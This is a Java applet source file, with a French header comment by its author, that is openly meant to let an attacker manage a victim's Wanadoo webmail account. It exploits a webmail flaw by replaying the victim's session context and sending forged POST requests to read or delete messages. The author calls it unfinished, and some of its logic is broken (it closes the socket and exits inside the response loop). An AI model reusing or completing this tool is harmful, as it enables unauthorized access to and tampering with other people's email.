/*
Cette applet est encore au stade de développement, et je ne la finirai vraisemblablement jamais.
C'est normalement elle qui devrait vous permettre de gérer les mails de votre victime, en envoyer etc.
Or c'est beaucoup de boulot et de complications au niveau du serveur pour pas grand chose vu que de toute façon je sais que la faille existe et que ça marchera. Si ça vous chante de la continuer libre à vous, moi j'ai fini mon travail qui était de démontrer le potentiel de la faille.

Raco.
*/



/* components :
      ctx
      msg0    (boolean)
      seltous (boolean)
      bouton  ("", "conf_delete")
      methode ("DeleteMsg", "MsgDisplay")  ("MsgDisplay" -> idmsg=$msg[x])
      folder  ("inbox")
      idmsg   ("");
      list    ($idmsg+' ');
*/

import java.applet.*;
import java.awt.*;
import java.io.*;
import java.net.*;

public class WanadooWebMailManager extends Applet {
    TextField ctxfield, idmsg, list, action;
    TextField[] msgfield;
    Checkbox[] msgbox;
    Checkbox seltous;
    Choice bouton, methode, folder;
    Button post;

    public WanadooWebMailManager() {}

    public void init() {
        int number=0; 
        String str;
        while((str=getParameter("msg"+number))!=null)
            number++;
        initFrame(number);
      //initParams();
    }

    private void initFrame(int number) {
        add(new Label("action :"));
        action = new TextField(40);
        add(action);
        add(new Label("ctx :"));
        ctxfield = new TextField(20);
        add(ctxfield);
        msgfield = new TextField[number];
        msgbox = new Checkbox[number];
        for(int i=0; i<number; i++) {
            String key = "msg"+i;
            msgbox[i] = new Checkbox(key);
            msgfield[i] = new TextField(getParameter(key), 4);
            add(msgbox[i]);
            add(msgfield[i]);
        }
        seltous = new Checkbox("Selectionner tout");
        add(seltous);
        add(new Label("bouton :"));
        bouton = new Choice();
        bouton.addItem("");
        bouton.addItem("conf_delete");
        add(bouton);
        add(new Label("methode :"));
        methode = new Choice();
        methode.addItem("DeleteMsg");
        methode.addItem("MsgDisplay");
        add(methode);
        add(new Label("folder :"));
        folder = new Choice();
        folder.addItem("inbox");
        add(folder);
        idmsg = new TextField(4);
        add(new Label("idmsg :"));
        add(idmsg);
        list = new TextField(5*number);
        add(new Label("list :"));
        add(list);
        post = new Button("POST !");
        add(post);
    }

    public boolean action(Event evt, Object arg) {
        if(evt.target==seltous) {
            boolean state = seltous.getState();
            if(state) seltous.setLabel("Deselectionner tout");
            else seltous.setLabel("Selectionner tout");
            for(int i=0; i<msgbox.length; i++) {
                msgbox[i].setState(state);
            }
        } else if(evt.target==post) {
            System.out.println("Started collection");
            StringBuffer buf = new StringBuffer();
            buf.append("ctx=").append(ctxfield.getText()).append('&');
            for(int i=0; i<msgbox.length; i++) {
                buf.append(msgbox[i].getLabel()).append('=').append(msgfield[i].getText()).append('&');
            }
            buf.append("seltous=").append(String.valueOf(seltous.getState())).append('&');
            buf.append("bouton=").append(bouton.getSelectedItem()).append('&');
            buf.append("methode=").append(methode.getSelectedItem()).append('&');
            buf.append("folder=").append(folder.getSelectedItem()).append('&');
            buf.append("idmsg=").append(idmsg.getText()).append('&');
            buf.append("list=").append(list.getText());
            System.out.println(buf.toString());
            try {
                Socket socket = new Socket("www.wanadoo.fr", 80);
                BufferedWriter out = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
                BufferedReader in = new BufferedReader(new InputStreamReader(socket.getInputStream()));
                out.write("POST "+action.getText()+" HTTP/1.0");
                out.write("\n");
                out.write("Host: www.wanadoo.fr");
                out.write("\n");
                out.write("Content-type: application/x-www-form-urlencoded");
                out.write("\n");
                out.write("Content-length: "+buf.length());
                out.write("\n");
                out.write("\n");
                out.write(buf.toString());
                out.flush();

                StringBuffer buf2 = new StringBuffer();
                String line;
                while ((line = in.readLine()) != null) {
                    System.out.println(line);
                    buf2.append(line+"\n");
                    socket.close();
                    System.exit(0);
                } 
            } catch(Exception e) {
                e.printStackTrace();
            }
        }
        return true;
    }
}